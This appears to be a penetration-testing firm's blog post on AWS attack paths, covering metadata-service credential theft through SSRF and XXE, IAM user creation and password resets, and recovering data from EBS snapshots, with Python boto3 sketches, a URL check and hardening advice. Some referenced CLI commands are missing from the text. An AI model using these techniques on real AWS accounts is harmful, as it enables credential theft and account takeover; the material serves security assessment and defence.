AWS Security Vulnerabilities and Configurations

As specialists in AWS penetration testing, we’re constantly reviewing the newest API updates and security features. These AWS security configurations range from ingress/egress firewalls and IAM (identity and access management) controls to advanced logging and monitoring capabilities. However, misconfigurations in these systems and applications can allow an attacker to pivot into your cloud and exfiltrate both internal and customer data.

Application Security – Traditional vs AWS Options

In the past, developers used hard-coded passwords to access different services, such as MySQL or FTP, to retrieve client data. Amazon recognized this poor security practice and implemented what is called the Amazon Metadata Service. Now, when your application wants to access assets, it can query the metadata service to get a set of temporary access credentials. The temporary credentials can then be used to access your S3 assets and other services. Another purpose of this metadata service is to store the user data supplied when launching your instance, which in turn configures your application as it launches.

As a developer, you stop reading here – an easily scalable infrastructure with streamlined builds, all of it executed from the command line? Done. If you’re a security researcher, you continue to read the addendum: “Although you can only access instance metadata and user data from within the instance itself, the data is not protected by cryptographic methods.”
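To make the "not protected" part concrete, here is a minimal Python sketch of how an application on the instance might read its temporary credentials. It assumes the instance still answers plain, token-less HTTP requests to the metadata service; the function names and the role name in the usage note are hypothetical, while the JSON field names are the ones the credential document uses.

```python
import json
import urllib.request

# Link-local address of the instance metadata service.
METADATA_BASE = "http://169.254.169.254/latest/meta-data/"


def credentials_url(role_name: str) -> str:
    """Build the credential URL for the role attached to the instance."""
    return f"{METADATA_BASE}iam/security-credentials/{role_name}"


def parse_credentials(body: str) -> dict:
    """Pull out the three values needed to sign AWS API requests."""
    doc = json.loads(body)
    return {
        "access_key": doc["AccessKeyId"],
        "secret_key": doc["SecretAccessKey"],
        "token": doc["Token"],
    }


def fetch_credentials(role_name: str, timeout: float = 2.0) -> dict:
    """Plain HTTP GET with no authentication; only reachable from the instance."""
    with urllib.request.urlopen(credentials_url(role_name), timeout=timeout) as resp:
        return parse_credentials(resp.read().decode("utf-8"))
```

Calling `fetch_credentials("demo-role")` on an instance with that role attached would return the key, secret, and session token. Nothing in the request proves who is asking, which is why any code path that can issue this GET matters.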

AWS “Metadata Service” Attack Surface

From the attacker’s perspective, this metadata service is one of the juiciest services on AWS to access. Reaching it from the application could yield total control if the application is running under the root IAM account, and at the very least gives you a set of valid AWS credentials to interface with the API.

Developers often overlook the risk of putting sensitive information into user startup scripts. These scripts allow EC2 instances to be spun up with certain configurations, and they can be read back through the metadata service. Some startup scripts contain usernames and passwords used to access various services.

When assessing a web application, look for functionality that fetches page data and returns it to the end user, much like a proxy would. Since the metadata service doesn’t require any particular parameters, fetching the URL http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_USER_ROLE_HERE will return the AccessKeyId, SecretAccessKey, and Token you need to authenticate into the account.

Recently, we discovered an instance of single sign-on functionality implemented insecurely for a client. It used XML to transfer data between the web application and Google’s account authentication, and we were able to leverage XML external entity injection to query the metadata service and return the credentials to our server.


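Proxy-like fetch features and XML parsers both end up issuing a request to an address the attacker chose. As a rough sketch of what recognizing such a request could look like, the hypothetical helper below flags URLs whose host is a literal link-local IP address. It does not resolve hostnames or follow redirects, so it illustrates the idea rather than serving as a complete filter.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_link_local(url: str) -> bool:
    """True when the URL's host is a literal link-local IP (e.g. 169.254.169.254)."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        return ipaddress.ip_address(host).is_link_local
    except ValueError:
        # The host is a name, not a literal IP. A fuller check would resolve
        # it first, since a DNS record can also point at 169.254.169.254.
        return False
```

For example, `targets_link_local("http://169.254.169.254/latest/meta-data/")` is true, while an ordinary public URL is not.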

Using the tool nimbostratus developed by Andres Riancho, we can now assess what the credentials we obtained can access. Andres’s nimbostratus presentation – found here – demonstrates how AWS infrastructure operates and how this tool helped him further his engagement. To view the permissions of your access keys, first configure your own AWS CLI with the following command:

After you’ve cloned the repository, run the following:

A screenshot showing the “nimbostratus” tool dumping the permissions of an AWS account.

In the best case, the script will tell you that you have obtained a root account and officially have the keys to the Amazon kingdom. At the very least, the script will detail your precise level of access to the AWS account. I won’t reveal all the capabilities here as Mr. Riancho covers them well in his talk, but if you’re doing an assessment involving AWS infrastructure, it is well worth watching.
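Separately from nimbostratus, a quick way to confirm that recovered keys are live is to load them into a boto3 session and ask STS who they belong to. The sketch below is not a replacement for the permission dump described above; the helper names are hypothetical, and `whoami` needs boto3 installed and network access.

```python
def session_kwargs(creds: dict) -> dict:
    """Map metadata-service field names to boto3.Session keyword arguments."""
    return {
        "aws_access_key_id": creds["AccessKeyId"],
        "aws_secret_access_key": creds["SecretAccessKey"],
        "aws_session_token": creds["Token"],
    }


def whoami(creds: dict) -> str:
    """Return the ARN that the credentials authenticate as."""
    import boto3  # imported lazily so session_kwargs works without boto3

    session = boto3.Session(**session_kwargs(creds))
    return session.client("sts").get_caller_identity()["Arn"]
```

The ARN returned by `get_caller_identity` tells you which role or user the keys map to, which is a useful first data point before enumerating permissions.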

If you are unable to obtain a root account, the next best thing is access to the IAM resource. If you have permissions to create IAM users but cannot access the EC2 resource, you can create a new IAM user through Python’s boto3 library or the command line. This method grants an attacker access to the missing EC2 security credentials and, once again, you have the keys to the kingdom. Moreover, you can update login profiles and passwords without verifying old credentials, allowing you to gain access to the AWS administration panel. IAM users can be extremely diverse in their privilege levels, which makes IAM appealing from a security perspective, but default implementations and misconfigurations can lead to critical vulnerabilities.
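In boto3 terms, the IAM calls involved might look like the sketch below. It takes an IAM client as a parameter (for example `boto3.client("iam")` built from the recovered credentials); the function names and user names are hypothetical. A newly created user has no permissions until a policy is attached, so whether this grants further access depends on what the compromised identity is allowed to attach.

```python
def create_user_with_key(iam, user_name: str) -> dict:
    """Create an IAM user and a long-lived access key for it."""
    iam.create_user(UserName=user_name)
    key = iam.create_access_key(UserName=user_name)["AccessKey"]
    return {
        "access_key": key["AccessKeyId"],
        "secret_key": key["SecretAccessKey"],
    }


def reset_console_password(iam, user_name: str, new_password: str) -> None:
    """Overwrite an existing user's console password; the old one is never requested."""
    iam.update_login_profile(UserName=user_name, Password=new_password)
```

The second function shows the point made above: the API accepts a new console password without any proof of the old one.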

Security Configurations to AWS

Amazon also allows you to create custom machine images, enabling you to preconfigure an environment for each of your servers. This pre-configuration could include pre-installed tools and source code. To list the custom images your account has access to, use the following Amazon CLI command:


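The same listing can be sketched with boto3. The helper below is hypothetical and expects an EC2 client such as `boto3.client("ec2", region_name=...)`; `Owners=["self"]` restricts the result to images owned by the calling account.

```python
def list_own_images(ec2) -> list:
    """Return (image id, name) pairs for images owned by the calling account."""
    response = ec2.describe_images(Owners=["self"])
    # Name is optional on an image, so fall back to an empty string.
    return [(img["ImageId"], img.get("Name", "")) for img in response["Images"]]
```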

You can then run an instance of this custom image using the run-instances command to see what tools and files were pre-installed into the custom image.

Note: When creating an EC2 instance, make your own key pair for the EC2 instance and ensure the security group permissions allow inbound connections from your IP address. We’ll use the command line both to create a new key pair and to open up the security group to your IP address. It is necessary to create a new key pair on the account as uploading private keys is not allowed through the Amazon CLI.

Creating a new key pair using the Amazon CLI and outputting the private key contents to a file rsl3.pem

Authorizing the security group to allow inbound SSH connections. In a real scenario, change the CidrIp parameter to your own IPv4 address, as the command above opens the port to all addresses.


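The three steps (new key pair, SSH ingress rule, launch) could be sketched in boto3 as follows. The function names, the `t2.micro` instance type, and every identifier passed in are assumptions for illustration. Unlike a rule that opens the port to all addresses, this sketch restricts SSH to a single IPv4 address.

```python
import ipaddress
import os


def ssh_ingress_args(group_id: str, source_ip: str) -> dict:
    """Arguments for a rule allowing SSH from exactly one IPv4 address."""
    cidr = f"{ipaddress.IPv4Address(source_ip)}/32"  # raises on invalid input
    return {
        "GroupId": group_id,
        "IpProtocol": "tcp",
        "FromPort": 22,
        "ToPort": 22,
        "CidrIp": cidr,
    }


def launch_from_image(ec2, image_id, key_name, group_id, source_ip, key_path):
    """Create a key pair, allow SSH from source_ip, and start one instance."""
    key = ec2.create_key_pair(KeyName=key_name)
    with open(key_path, "w") as handle:
        handle.write(key["KeyMaterial"])  # private key is only returned once
    os.chmod(key_path, 0o600)  # ssh refuses keys readable by other users

    ec2.authorize_security_group_ingress(**ssh_ingress_args(group_id, source_ip))
    result = ec2.run_instances(
        ImageId=image_id,
        InstanceType="t2.micro",  # assumed size; pick what the image needs
        KeyName=key_name,
        SecurityGroupIds=[group_id],
        MinCount=1,
        MaxCount=1,
    )
    return result["Instances"][0]["InstanceId"]
```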

Moreover, Amazon provides the ability for you to “snapshot” your machine’s state at any time. The snapshot feature is perfect for saving backups and creating restore points for instances that need to be taken offline for maintenance. What this means to an attacker is that even if you delete your S3 buckets, your snapshot data is still retrievable.

To restore a snapshot, you must first create an EC2 instance in the same region in which the snapshot was taken. Then, by creating an Elastic Block Store (EBS) volume in the same availability zone as the EC2 instance, you can attach the volume to the instance as a device (such as /dev/sd[b-z]).

The above image shows the creation of an EBS Volume from a snapshot. Note: The availability zone must be the same as the EC2 instance you wish to mount this volume on.

The above image shows the mounting of this volume onto your EC2 instance. This allows you to view the contents of the volume. In this case, we attached the volume created from the snapshot to explore its contents.
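The restore-and-attach sequence can be sketched with boto3 as below. The function name and the default device `/dev/sdf` are assumptions. The sketch reads the instance's availability zone first, so the new volume is always created where it can be attached.

```python
def restore_snapshot(ec2, snapshot_id: str, instance_id: str, device: str = "/dev/sdf") -> str:
    """Create a volume from a snapshot in the instance's zone and attach it."""
    reservations = ec2.describe_instances(InstanceIds=[instance_id])["Reservations"]
    zone = reservations[0]["Instances"][0]["Placement"]["AvailabilityZone"]

    volume_id = ec2.create_volume(SnapshotId=snapshot_id, AvailabilityZone=zone)["VolumeId"]
    # A freshly created volume cannot be attached until it reaches "available".
    ec2.get_waiter("volume_available").wait(VolumeIds=[volume_id])

    ec2.attach_volume(VolumeId=volume_id, InstanceId=instance_id, Device=device)
    return volume_id
```

After the call returns, the volume still has to be mounted from inside the instance before its files can be browsed.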

It’s important to note that regions are not the same as availability zones. You can think of availability zones as subsections of a region, so if you choose ‘us-east-1’ as your region, you might get any of ‘us-east-1[a-c]’ as your availability zone if you do not specify one. Unless the volume and the EC2 instance are in the same availability zone, you will not be able to attach your newly created volume.
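The relationship between the two names can be shown with a small, hypothetical helper. It assumes the standard zone naming, where a zone is the region name plus one trailing letter; zones that follow other naming schemes are rejected rather than guessed at.

```python
import re

# Region name followed by a single zone letter, e.g. "us-east-1" + "a".
_ZONE_PATTERN = re.compile(r"([a-z]{2}(?:-[a-z]+)+-\d+)([a-z])")


def region_of(zone: str) -> str:
    """Return the region a standard availability zone name belongs to."""
    match = _ZONE_PATTERN.fullmatch(zone)
    if match is None:
        raise ValueError(f"not a standard availability zone name: {zone!r}")
    return match.group(1)


def can_attach(volume_zone: str, instance_zone: str) -> bool:
    """A volume attaches only to an instance in the very same zone."""
    return volume_zone == instance_zone
```

Two zones can share a region (`region_of` returns the same value for both) and still fail `can_attach`, which is the case the paragraph above warns about.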

AWS Attacks – Real World Scenario

In one of Rhino Security Labs’ most recent engagements, the compromised AWS account only had access to list S3 buckets, list objects located in three of the ten buckets, and upload/download objects from only one bucket. However, the ability to pull objects down from one bucket yielded access to financial records, customer information, and startup scripts. The startup scripts described pulling public key records from the bucket to add and authenticate users that would SSH into the machine that ran these scripts. In this case, even though we did not have access to a root AWS account, access to just one bucket would be enough to backdoor all new infrastructure. It would also be extremely hard to detect the backdoored user, as no changes were made to a code base.
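Working out which buckets a set of credentials can actually list might be sketched as follows. The helper is hypothetical and takes an S3 client such as `boto3.client("s3")`. boto3 reports a denied request by raising `botocore.exceptions.ClientError`; the sketch catches `Exception` broadly only to stay free of that import.

```python
def listable_buckets(s3) -> list:
    """Return the names of buckets whose objects the credentials can list."""
    names = [bucket["Name"] for bucket in s3.list_buckets()["Buckets"]]
    allowed = []
    for name in names:
        try:
            # One key is enough to learn whether listing is permitted.
            s3.list_objects_v2(Bucket=name, MaxKeys=1)
        except Exception:
            continue  # typically AccessDenied for this bucket
        allowed.append(name)
    return allowed
```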

Another avenue of attack we have taken when exploiting AWS credentials is restoring and mounting EBS volumes created from snapshots. In one engagement, we had obtained a root account but found no trace of running EC2 instances or available S3 buckets under it. After further investigation, we learned the company had moved to a different AWS account and operated under the new credentials; however, the old credentials we had obtained still had hundreds if not thousands of snapshots available. After restoring and mounting these snapshots following the process above, we were able to discover old source code that the company continued to build on. This old source still contained sensitive information, such as GitHub credentials used to pull the developer repositories.
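With that many snapshots, the listing has to be paginated. A hypothetical boto3 sketch, taking an EC2 client for the region being examined, could look like this:

```python
def own_snapshots(ec2) -> list:
    """Return (snapshot id, size in GiB, description) for the account's snapshots."""
    paginator = ec2.get_paginator("describe_snapshots")
    found = []
    # OwnerIds=["self"] skips the very large set of public snapshots.
    for page in paginator.paginate(OwnerIds=["self"]):
        for snap in page["Snapshots"]:
            found.append((snap["SnapshotId"], snap["VolumeSize"], snap.get("Description", "")))
    return found
```

Snapshots are regional, so the call would be repeated with a client for each region in use.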

Conclusion

AWS security has the potential to be very strong, but poor configurations have led to more than one serious security breach. When implementing your security infrastructure, be sure to create different identity and access management (IAM) users for each service and only provide access to the resources each user requires. If you need to process client data, create a storage bucket just for client data. If your machines need to pull configuration data from the cloud, move this data to its own S3 bucket and create a separate IAM account just to access that data. Not doing so could potentially lead to a vertical privilege escalation like the one in the attack above. Lastly, it is imperative to analyze the trust relationships between the external services you use, and to perform regular penetration testing against your AWS environment. Whenever you choose a service to supplement your business, you must understand the default configurations used by the third party and how they must be changed to fit your environment.
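As an illustration of "only provide access to the resources each user requires", the sketch below builds a read-only IAM policy scoped to a single bucket. The function name and the bucket name in the usage note are hypothetical; the policy grammar (`Version`, `Statement`, `Effect`, `Action`, `Resource`) is the standard IAM JSON format.

```python
import json


def read_only_bucket_policy(bucket: str) -> str:
    """Build an IAM policy that can list and read one bucket and nothing else."""
    policy = {
        "Version": "2012-10-17",
        "Statement": [
            {
                # Listing is granted on the bucket itself.
                "Effect": "Allow",
                "Action": ["s3:ListBucket"],
                "Resource": f"arn:aws:s3:::{bucket}",
            },
            {
                # Reading is granted on the objects inside it.
                "Effect": "Allow",
                "Action": ["s3:GetObject"],
                "Resource": f"arn:aws:s3:::{bucket}/*",
            },
        ],
    }
    return json.dumps(policy, indent=2)
```

A user holding only `read_only_bucket_policy("instance-config")` cannot upload to that bucket or touch any other one, which would have blocked the startup-script scenario described earlier.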